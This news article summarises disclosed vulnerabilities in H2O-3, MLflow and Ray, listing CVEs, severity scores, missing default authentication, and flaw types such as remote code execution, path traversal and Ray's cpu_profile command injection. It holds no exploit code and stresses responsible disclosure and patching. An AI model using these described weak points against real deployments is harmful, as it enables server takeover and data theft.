Over a dozen vulnerabilities expose AI/ML models to system takeover and data theft

TL;DR:

  • Multiple vulnerabilities were uncovered in AI/ML tools like H2O-3, MLflow, and Ray.
  • Vulnerabilities expose AI/ML models to system takeover and data theft.
  • H2O-3’s default installation lacks authentication, allowing malicious Java objects to execute.
  • Critical RCE vulnerability in H2O-3 (CVE-2023-6016) enables full server takeover.
  • Additional issues in H2O-3: Local files include flaws (CVE-2023-6038), XSS bugs (CVE-2023-6013), and S3 bucket takeover (CVE-2023-6017).
  • MLflow also lacks default authentication and has four critical vulnerabilities.
  • The most severe in MLflow are arbitrary file write and path traversal bugs (CVE-2023-6018 and CVE-2023-6015).
  • Ray, an open-source framework, shares the authentication issue and has a critical code injection flaw (CVE-2023-6019).
  • Two critical local files include vulnerabilities in Ray (CVE-2023-6020 and CVE-2023-6021).
  • All vulnerabilities are reported to vendors with a 45-day disclosure period.
  • Users are advised to update to non-vulnerable versions and restrict access in the absence of patches.

Main AI News:

Since August 2023, the Huntr bug bounty platform has been a hotbed of activity, with members unveiling more than a dozen vulnerabilities that pose a grave threat to artificial intelligence (AI) and machine learning (ML) models. These vulnerabilities lay bare these AI/ML tools to the perilous risks of system takeover and sensitive information theft, raising significant concerns within the industry.

These vulnerabilities were discovered in tools boasting hundreds of thousands, if not millions, of downloads per month. Prominent among them are H2O-3, MLflow, and Ray, software that plays pivotal roles in the AI/ML ecosystem. The implications of these discoveries ripple throughout the AI/ML supply chain, emphasizing the need for immediate action and vigilance.

H2O-3, a low-code machine learning platform, offers a convenient means to create and deploy ML models through a user-friendly web interface. Its appeal lies in its simplicity – the ability to import data and remotely upload Java objects via API calls. However, herein lies the vulnerability; the default installation of H2O-3 is exposed to the network and lacks authentication, rendering it susceptible to exploitation. Attackers can cunningly provide malicious Java objects that H2O-3 unwittingly executes, thereby granting them access to the underlying operating system.

The most menacing vulnerability, tracked as CVE-2023-6016 (CVSS score of 10), is a remote code execution (RCE) flaw that bestows attackers with the power to wrest control of the server entirely. In doing so, they can pilfer critical models, credentials, and other sensitive data. This is a stark reminder of the perils lurking within AI/ML infrastructure.

In addition to the RCE flaw, diligent bug hunters discovered two other critical issues in this low-code service: a local file, including vulnerability (CVE-2023-6038) and a cross-site scripting (XSS) bug (CVE-2023-6013). Furthermore, a high-severity S3 bucket takeover vulnerability (CVE-2023-6017) compounds the risks, underscoring the urgent need for remediation.

MLflow, an open-source platform essential for managing the end-to-end ML lifecycle, mirrors H2O-3’s vulnerability posture. By default, it lacks authentication, leaving the door ajar for malicious actors. Researchers identified four critical vulnerabilities, with the most dire being arbitrary file write and path traversal bugs (CVE-2023-6018 and CVE-2023-6015, both carrying a CVSS score of 10). These vulnerabilities empower unauthenticated attackers to overwrite critical files on the operating system and execute remote code, a nightmare scenario for security professionals.

Furthermore, MLflow was found to be susceptible to critical-severity arbitrary file inclusion (CVE-2023-1177) and authentication bypass (CVE-2023-6014) vulnerabilities, further intensifying the threat landscape.

The Ray project, an open-source framework for distributed ML model training, echoes the alarming trend of lacking default authentication. A critical code injection vulnerability was uncovered in Ray’s cpu_profile format parameter (CVE-2023-6019, CVSS score of 10), which is capable of triggering a complete system compromise. This vulnerability stems from inadequate validation of the parameter before its execution in a shell command.

Bug hunters also unearthed two critical local file inclusion vulnerabilities in Ray (CVE-2023-6020 and CVE-2023-6021), allowing remote attackers to peruse any files within the Ray system.

It is worth noting that all vulnerabilities were reported to vendors a minimum of 45 days before public disclosure, emphasizing responsible disclosure practices. Users are urged to promptly update their installations to the latest non-vulnerable versions and institute stringent access restrictions where patches are unavailable.

Conclusion:

The discovery of numerous vulnerabilities in widely used AI/ML tools underscores the critical importance of cybersecurity in the AI/ML market. Organizations must prioritize security measures to protect their models and data, as these vulnerabilities pose significant risks to the AI/ML supply chain. Failure to address these issues can result in severe consequences, including data breaches and system compromise, with potential reputational and financial damage to businesses.

Source